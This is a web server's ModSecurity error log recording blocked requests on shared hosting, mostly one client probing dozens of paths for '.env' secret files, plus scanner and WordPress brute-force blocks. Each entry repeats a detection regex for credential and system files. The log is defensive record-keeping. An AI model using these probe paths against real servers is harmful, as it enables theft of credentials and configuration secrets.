[Tue May 26 19:10:48.729265 2026] [security2:error] [pid 18465:tid 18586] [remote 216.73.217.110:2452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahWi4E6GHndkguR9cLJzGwAAfXg"]
[Tue May 26 19:10:49.073058 2026] [security2:error] [pid 18465:tid 18602] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi4E6GHndkguR9cLJzFwAAAAc"]
[Tue May 26 19:10:49.400850 2026] [security2:error] [pid 18465:tid 18718] [client 106.219.160.89:16705] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi4U6GHndkguR9cLJzKQAAAHo"], referer: http://politica-global.com
[Tue May 26 19:10:50.501998 2026] [security2:error] [pid 18465:tid 18591] [remote 103.230.156.120:57538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWi4k6GHndkguR9cLJzRQAAaH0"]
[Tue May 26 19:10:50.670925 2026] [security2:error] [pid 18465:tid 18697] [client 93.123.109.10:33100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/app/.env"] [unique_id "ahWi4k6GHndkguR9cLJzUAAAAGU"]
[Tue May 26 19:10:50.680937 2026] [security2:error] [pid 18465:tid 18612] [client 93.123.109.10:33332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/customers/.env"] [unique_id "ahWi4k6GHndkguR9cLJzVwAAABE"]
[Tue May 26 19:10:50.681271 2026] [security2:error] [pid 18465:tid 18686] [client 93.123.109.10:33090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/.env"] [unique_id "ahWi4k6GHndkguR9cLJzWQAAAFo"]
[Tue May 26 19:10:50.681386 2026] [security2:error] [pid 18465:tid 18681] [client 93.123.109.10:33176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/v2/.env"] [unique_id "ahWi4k6GHndkguR9cLJzWwAAAFU"]
[Tue May 26 19:10:50.681459 2026] [security2:error] [pid 18465:tid 18600] [client 93.123.109.10:33398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/uploads/.env"] [unique_id "ahWi4k6GHndkguR9cLJzUQAAAAU"]
[Tue May 26 19:10:50.682090 2026] [security2:error] [pid 18465:tid 18682] [client 93.123.109.10:33386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/db/.env"] [unique_id "ahWi4k6GHndkguR9cLJzYQAAAFY"]
[Tue May 26 19:10:50.682097 2026] [security2:error] [pid 18465:tid 18683] [client 93.123.109.10:33300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/backend/.env"] [unique_id "ahWi4k6GHndkguR9cLJzYAAAAFc"]
[Tue May 26 19:10:50.682196 2026] [security2:error] [pid 18465:tid 18722] [client 93.123.109.10:33244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/config/.env"] [unique_id "ahWi4k6GHndkguR9cLJzXgAAAH4"]
[Tue May 26 19:10:50.682215 2026] [security2:error] [pid 18465:tid 18660] [client 93.123.109.10:33308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/client/.env"] [unique_id "ahWi4k6GHndkguR9cLJzWgAAAEA"]
[Tue May 26 19:10:50.682310 2026] [security2:error] [pid 18465:tid 18606] [client 93.123.109.10:33320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/clients/.env"] [unique_id "ahWi4k6GHndkguR9cLJzXwAAAAs"]
[Tue May 26 19:10:50.682579 2026] [security2:error] [pid 18465:tid 18693] [client 93.123.109.10:33070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/backup/.env"] [unique_id "ahWi4k6GHndkguR9cLJzXAAAAGE"]
[Tue May 26 19:10:50.682636 2026] [security2:error] [pid 18465:tid 18695] [client 93.123.109.10:33360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/wp/.env"] [unique_id "ahWi4k6GHndkguR9cLJzUgAAAGM"]
[Tue May 26 19:10:50.683252 2026] [security2:error] [pid 18465:tid 18667] [client 93.123.109.10:33270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/apps/.env"] [unique_id "ahWi4k6GHndkguR9cLJzXQAAAEc"]
[Tue May 26 19:10:50.683386 2026] [security2:error] [pid 18465:tid 18650] [client 93.123.109.10:33280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/core/.env"] [unique_id "ahWi4k6GHndkguR9cLJzWAAAADY"]
[Tue May 26 19:10:50.684096 2026] [security2:error] [pid 18465:tid 18715] [client 93.123.109.10:33324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/customer/.env"] [unique_id "ahWi4k6GHndkguR9cLJzYwAAAHc"]
[Tue May 26 19:10:50.684375 2026] [security2:error] [pid 18465:tid 18682] [client 93.123.109.10:33086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/.env"] [unique_id "ahWi4k6GHndkguR9cLJzbgAAAFY"]
[Tue May 26 19:10:50.684421 2026] [security2:error] [pid 18465:tid 18605] [client 93.123.109.10:33156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/dev/.env"] [unique_id "ahWi4k6GHndkguR9cLJzZAAAAAo"]
[Tue May 26 19:10:50.684601 2026] [security2:error] [pid 18465:tid 18688] [client 93.123.109.10:33146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/public/.env"] [unique_id "ahWi4k6GHndkguR9cLJzcgAAAFw"]
[Tue May 26 19:10:50.684728 2026] [security2:error] [pid 18465:tid 18659] [client 93.123.109.10:33164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/v1/.env"] [unique_id "ahWi4k6GHndkguR9cLJzZwAAAD8"]
[Tue May 26 19:10:50.684780 2026] [security2:error] [pid 18465:tid 18606] [client 93.123.109.10:33394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/upload/.env"] [unique_id "ahWi4k6GHndkguR9cLJzcAAAAAs"]
[Tue May 26 19:10:50.684818 2026] [security2:error] [pid 18465:tid 18673] [client 93.123.109.10:33136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/storage/.env"] [unique_id "ahWi4k6GHndkguR9cLJzcwAAAE0"]
[Tue May 26 19:10:50.684923 2026] [security2:error] [pid 18465:tid 18708] [client 93.123.109.10:33126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/laravel/.env"] [unique_id "ahWi4k6GHndkguR9cLJzdAAAAHA"]
[Tue May 26 19:10:50.685178 2026] [security2:error] [pid 18465:tid 18629] [client 93.123.109.10:33110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/system/.env"] [unique_id "ahWi4k6GHndkguR9cLJzbwAAACE"]
[Tue May 26 19:10:50.685486 2026] [security2:error] [pid 18465:tid 18600] [client 93.123.109.10:33362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/cms/.env"] [unique_id "ahWi4k6GHndkguR9cLJzagAAAAU"]
[Tue May 26 19:10:50.686644 2026] [security2:error] [pid 18465:tid 18709] [client 93.123.109.10:33374] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/database/.env"] [unique_id "ahWi4k6GHndkguR9cLJzZgAAAHE"]
[Tue May 26 19:10:50.687285 2026] [security2:error] [pid 18465:tid 18695] [client 93.123.109.10:33292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/apps/config/.env"] [unique_id "ahWi4k6GHndkguR9cLJzaQAAAGM"]
[Tue May 26 19:10:50.688070 2026] [security2:error] [pid 18465:tid 18621] [client 93.123.109.10:33258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/app/config/.env"] [unique_id "ahWi4k6GHndkguR9cLJzcQAAABk"]
[Tue May 26 19:10:50.688279 2026] [security2:error] [pid 18465:tid 18721] [client 93.123.109.10:33132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/vendor/.env"] [unique_id "ahWi4k6GHndkguR9cLJzVgAAAH0"]
[Tue May 26 19:10:50.693032 2026] [security2:error] [pid 18465:tid 18489] [remote 74.7.241.58:52074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWi4k6GHndkguR9cLJzdgAAMxc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ru
[Tue May 26 19:10:50.773039 2026] [security2:error] [pid 18465:tid 18612] [client 93.123.109.10:33230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/.env.local.php"] [unique_id "ahWi4k6GHndkguR9cLJzZQAAABE"]
[Tue May 26 19:10:50.832601 2026] [security2:error] [pid 18465:tid 18718] [client 93.123.109.10:33510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/2023/.env"] [unique_id "ahWi4k6GHndkguR9cLJzfQAAAHo"]
[Tue May 26 19:10:50.832605 2026] [security2:error] [pid 18465:tid 18652] [client 93.123.109.10:33482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/2020/.env"] [unique_id "ahWi4k6GHndkguR9cLJzfwAAADg"]
[Tue May 26 19:10:50.833353 2026] [security2:error] [pid 18465:tid 18698] [client 93.123.109.10:33464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/wordpress/.env"] [unique_id "ahWi4k6GHndkguR9cLJzfgAAAGY"]
[Tue May 26 19:10:50.837061 2026] [security2:error] [pid 18465:tid 18638] [client 93.123.109.10:33502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/2022/.env"] [unique_id "ahWi4k6GHndkguR9cLJzgAAAACo"]
[Tue May 26 19:10:50.849152 2026] [security2:error] [pid 18465:tid 18607] [client 93.123.109.10:33460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/old/.env"] [unique_id "ahWi4k6GHndkguR9cLJzgwAAAAw"]
[Tue May 26 19:10:50.849314 2026] [security2:error] [pid 18465:tid 18640] [client 93.123.109.10:33408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/v1/.env"] [unique_id "ahWi4k6GHndkguR9cLJzhAAAACw"]
